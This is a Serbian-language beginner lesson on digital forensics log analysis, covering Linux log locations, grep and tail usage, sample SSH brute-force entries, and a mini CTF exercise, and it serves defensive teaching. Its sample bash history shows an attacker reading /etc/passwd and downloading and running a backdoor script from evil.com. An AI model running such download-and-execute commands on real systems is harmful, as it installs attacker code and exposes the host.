Digitalna forenzika lako

Analiza logova

1️⃣ Šta su logovi?

Logovi (eng. logs) su zapisi o događajima koji se dešavaju na sistemu — ko se prijavio, kada, koja komanda je pokrenuta, koji fajl je otvoren, koja greška se desila. Svaki operativni sistem, server i aplikacija generiše logove.

U sajber bezbednosti, logovi su često jedini trag koji napadač ostavlja za sobom.

Zašto su logovi važni?

  • ✔ otkrivaju ko je pristupio sistemu i kada
  • ✔ beleže sve komande koje su pokrenute
  • ✔ pokazuju koje fajlove je neko otvorio, izmenio ili dodao
  • ✔ pomažu u rekonstrukciji napada korak po korak

2️⃣ Gde se nalaze logovi na Linuxu?

Putanja Sadržaj
/var/log/auth.log Prijave, sudo komande, SSH pokušaji
/var/log/syslog Opšti sistemski događaji
/var/log/kern.log Poruke Linux kernela
/var/log/apache2/ Apache web server logovi
/var/log/nginx/ Nginx web server logovi
/var/log/dpkg.log Instalacija i uklanjanje paketa
~/.bash_history Istorija komandi trenutnog korisnika

3️⃣ Čitanje logova

Prikaži ceo log fajl

cat /var/log/auth.log

Prikaži poslednjih N linija

tail -n 50 /var/log/auth.log

Prati log u realnom vremenu

tail -f /var/log/auth.log

Pretraži log po ključnoj reči

grep "Failed" /var/log/auth.log

Pretraži više logova odjednom

grep -r "error" /var/log/

4️⃣ Šta tražiti u logovima?

Neuspeli pokušaji prijave (brute force)

grep "Failed password" /var/log/auth.log

Mar  8 03:14:22 server sshd[1234]: Failed password for root from 192.168.1.105 port 52341
Mar  8 03:14:23 server sshd[1234]: Failed password for root from 192.168.1.105 port 52342
Mar  8 03:14:24 server sshd[1234]: Failed password for root from 192.168.1.105 port 52343

Stotine neuspelih pokušaja u sekundi — klasičan brute force napad.

Uspešna prijava nakon neuspelih pokušaja

grep "Accepted password" /var/log/auth.log

Mar  8 03:14:31 server sshd[1234]: Accepted password for root from 192.168.1.105 port 52351

Napadač je probio lozinku — ovo je trenutak kada je dobio pristup.

Sudo komande — šta je radio nakon prijave

grep "sudo" /var/log/auth.log

5️⃣ Analiza bash istorije

Kada napadač dobije pristup sistemu, njegove komande se beleže u bash istoriji.

cat ~/.bash_history

ls /etc
cat /etc/passwd
wget http://evil.com/backdoor.sh
chmod +x backdoor.sh
./backdoor.sh

Vidimo tačno šta je napadač radio nakon što je ušao u sistem.

🚩 Mini CTF

Sistem je kompromitovan. U log fajlu breach.log zabeleženi su događaji iz noći napada. Analizom logova utvrdi koji fajl je napadač dodao u sistem.

💡Logove možete pogledati u bilo kojem programu za uređivanje teksta.

📎 Fajl: 📥 Preuzmi log fajl

Rešenje je bez ekstenzije fajla

Pomoć Traži linije koje sadrže reči kao što su `wget`, `curl`, `scp` ili `UPLOAD`

📝 Provera Znanja

Unesite svoj odgovor ispod da biste proverili da li ste razumeli lekciju:


← Prethodna Lekcija 📚 Sve Lekcije Sledeća Lekcija →